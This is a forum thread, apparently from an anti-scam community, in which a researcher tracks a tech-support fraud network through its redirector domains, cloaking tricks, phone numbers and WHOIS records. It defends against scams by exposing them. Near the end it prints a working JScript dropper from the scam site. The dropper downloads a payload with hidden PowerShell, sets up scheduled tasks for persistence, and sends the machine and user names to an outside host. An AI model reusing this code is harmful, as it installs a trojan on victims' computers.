Now some news: the redirector has changed its target to https://activation.begin.rest/turbotax/
I reported this multi-scam website here:
suspecting that it was a Web InfoTech property. Now there is more evidence.
1個讚
Another thing, kind of a puzzle:
A bunch of this scam group’s impersonation web sites share this “DG” logo
as a favicon and/or elsewhere. It never seems related to the supposed topic of the website (Turbotax, HBO Max, Fidelity investments…)
What does DG stand for? Is it a clue?
1個讚
Guess what? This same number is also the “support” number for the Microsoft mobile phone linking scheme
Phishing page https://akas.prinset.shop/
inevitably leads to the fake error page Phone Link
Associated tawk.to account https://tawk.to/chat/65182c27e6bed319d0048030/1hbj6oupp
These scammers are hungry – put your phone number in the form on the phishing page and Peter Mam or one of his fellow Support Executives will call you right away on a Saturday. I got a call from Peter Mam on 856-212-1306.
2個讚
I submitted the phishing page. Sunday.
2個讚
Here’s what I think is another piece of their Internet infrastructure.
Take for example this fake TurboTax page https://installtaxturbo.com/install-turbotax-with-license-code/
It links to the site Download & Install TurboTax® Desktop 2024-2025 which I’ve noted as a suspected Web Infotech property in a couple other threads, via a redirecting domain, “ww0.us.”
see Fake HP Printer scammer websites - #10 by ElmerFudde2020 for another example.
Now, for the redirection to work, a http parameter has to be passed to ww0.us (after the “?” in the URL). The usual parameters I’ve seen seem to be base64-encoded URLs.
However, what about a sort of default or dummy parameter? Is there a default or fallback response?
What if we tried https://ww0.us/?I_AM_A_SCAMMER ?
Guess where it redirects to?
3個讚
More on ww0.us: Currently Whois records say the domain is administered by a “Roger Watts” at a very modest residential address in New Jersey (I’m not going to post the exact address because there’s a good chance it’s fake and whoever lives there has nothing to do with this).
Registered admin email [email protected] is also the admin for two obvious phishing domains, both registered in January of this year
https://activateuhccom.us/ and https://activateuhc.us/ , both pretending to be United Healthcare, and both of which are probably more scammy than the real UHC which is hard to beat.
The link on the second address uses the ww0.us redirector/obfuscator!
aHR0cHM6Ly9hY3RpdmF0ZXVoYy51cw== is just the originating URL, https://activateuhc.us , in base64.
It redirects to, where else?, a subdirectory of activation.begin.support – setup your activate.uhc.com (it will return a dummy page unless you access it through the phishing redirector link).
and of course there’s an error, why not! setup your activate.uhc.com
New toll-free number: 855-222-8365. I get the standard “blacklisted” message that I get from Web Infotech numbers when I call from my main research phone.
But wait, there’s more. Up until December 26 of last year, ww0.us was owned by a Salman Khan of Rajasthan, email [email protected] (cool email address Salman!) The other domain registered to that address is a very suspicious https://youtube.gs/
*Note: Salman Khan is the name of a famous Bollywood actor, probably not the same guy! And quite likely not even a real name for one of our scammers, just a little joke from them.
3個讚
i think the link is changed now!
4個讚
New website: tx.newredir.com now redirects to Download & Install TurboTax® Desktop 2024-2025 .
So over the course of the month this multi-scam website has moved from activation.begin.rest to activation.begin.support to activation.begin.lat.
5個讚
If your browser user-agent is set to Chrome on Android, tx.newredir.com once again redirects to https://ts.activatetax.pro/Installation-Error-Contact-Support.php . Probably works for some other browser user agent combos. New toll-free phone number: 855-531-2626.
3個讚
Via a google search I found another subdirectory of this multi-scam site. This one doesn’t seem to check for referrer, user-agent or http parameters
2個讚
A new domain I discovered today
The Google Sites page Activate my Capital One card online at Activate.capitalone.com links to
If the browser user agent is a mobile phone variety, it redirects to
https://activation-support.tax-com.com/capitalone/enter-code.php
with the error page https://activation-support.tax-com.com/capitalone/authentication-error.php
new toll-free number: 866-593-3778.
Here’s a spam post that’s a catalogue of related phishing sites, including other subdomains of tax-com.com:
(copy archived at web.archive.org installturbotax | Players list | Bandori Party - BanG Dream! Girls Band Party )
2個讚
And today this page has another new toll-free number: 855-613-0464.
2個讚
New toll-free number spotted today: 855-668-8507.
3個讚
New website and new phone number. The redirect yields the scamming page for Safari/iOS (but oddly, not Chrome/Android).
https://activation-support.tellmenew.com/capitalone/authentication-error.php
855-619-8688
3個讚
866-217-2243 is active again at https://myefiling.online//Installation-Error-Contact-Support.php .
Update later the same day: a new toll free number, 855-923-3385.
In other news, the old redirecting site tx.newredir.com seems to have finally gone down (for now?) and all their thousands of SEO spam feeder pages are being updated with a new intermediate domain, ts.remdos.com. E.g. Installturbotax.com . Registrar is AppCroNix Infotech Private Limited, d/b/a VEBONIX.com, registered just five days ago.
2個讚
Update on this: with my browser user agent set to MS Edge on Windows, activateuhc.us directs me via ww0.us to a new phishing domain, setup your activate.uhc.com . After entering my (fake) info, the form sends me to this page:
Which prompts me to download and install a zip-compressed EXE file and run it! Wow that can’t be good. Anyone want to do some analysis on the file?
The parent domain freetechsupport.org returns a bare-bones “tech support” website with a phone number: 856-240-0005.
Google says 856-240-0005 is also the number for:
- Book Flights Easily with Flights on Deals | Flights on Deals
- fixaprinter - Contect Us
- Contact Dazzling India for Luxurious Travel Experiences | Dazzling India
- Contact us
- Cricut Design Space
- Contact Us - canonoobe.com
- Windows 12 IO - Your Ultimate Guide to Windows 12
- https://www.printer.com.co/
- https://www.roku.cam/
1個讚
So the “EXE” file is not actually a binary file but some kind of Powershell thing that downloads from various URLs – still very malicious!
var shell = new ActiveXObject("WScript.Shell");
var fso = new ActiveXObject("Scripting.FileSystemObject");
var localAppData = shell.ExpandEnvironmentStrings("%LOCALAPPDATA%");
var updateBatPath = localAppData + "\\update.bat";
var backupBatPath = localAppData + "\\backup.bat";
var updateBatContent = "@echo off\n";
updateBatContent += "start /min cmd /c PowerShell.exe -WindowStyle Hidden -Command \"Invoke-WebRequest -Uri 'http://dr5.org/in.mp3' -OutFile '" + backupBatPath + "'\"\n";
var updateBatFile = fso.CreateTextFile(updateBatPath, true);
updateBatFile.Write(updateBatContent);
updateBatFile.Close();
function createScheduledTask(taskName, taskTime, taskPath) {
var command = 'SCHTASKS /Create /SC DAILY /TN "' + taskName + '" /TR "' + taskPath + '" /ST ' + taskTime + ' /RU "' + shell.ExpandEnvironmentStrings("%USERNAME%") + '" /F';
shell.Run("cmd /c echo N | " + command, 0, true);
}
createScheduledTask("MyTasks\\1", "11:05", '"' + updateBatPath + '"');
createScheduledTask("MyTasks\\2", "11:06", '"' + backupBatPath + '"');
createScheduledTask("MyTasks\\3", "19:05", '"' + updateBatPath + '"');
createScheduledTask("MyTasks\\4", "19:06", '"' + backupBatPath + '"');
var computerName = shell.ExpandEnvironmentStrings("%COMPUTERNAME%");
var userName = shell.ExpandEnvironmentStrings("%USERNAME%");
var url = "http://l77.org/downloading.php?dl=uhc&id=" + computerName + "_" + userName;
shell.Run("cmd /c start /min " + url, 0, false);
1個讚
So, if you query this URL using a Windows Powershell user-agent string, you get something that isn’t an MP3 file (maybe the extension is to deceive firewalls or antivirus heuristics?) but a Windows shell script. I’m not good at analyzing this but it involves scheduling a bunch of recurring background tasks, and something named Antivirus-Update.bat. Any experts out there who can help decoding this?
I’m trying to paste the code into this comment but I’m getting a “403 error,” maybe it’s too long or something?
Update: I put the file through hybrid-analysis.com and it says it’s the “Trojan.Script.Agent.khixek” aka the AdsExhaust trojan, which supposedly generates fake clicks on pay-per-click ads or something like that?
1個讚
ts.remdos.com is still going, but a new intermediate redirector domain has been added to the multiple-step path of redirection: taxredir.online, registered on 19 March 2025.
And a new toll-free fake Turbotax number: 855-984-0698.
Update 5 April 2025: New toll-free fake TurboTax: 855-984-0972.
3個讚
Vonage number (786) 946-2540
1個讚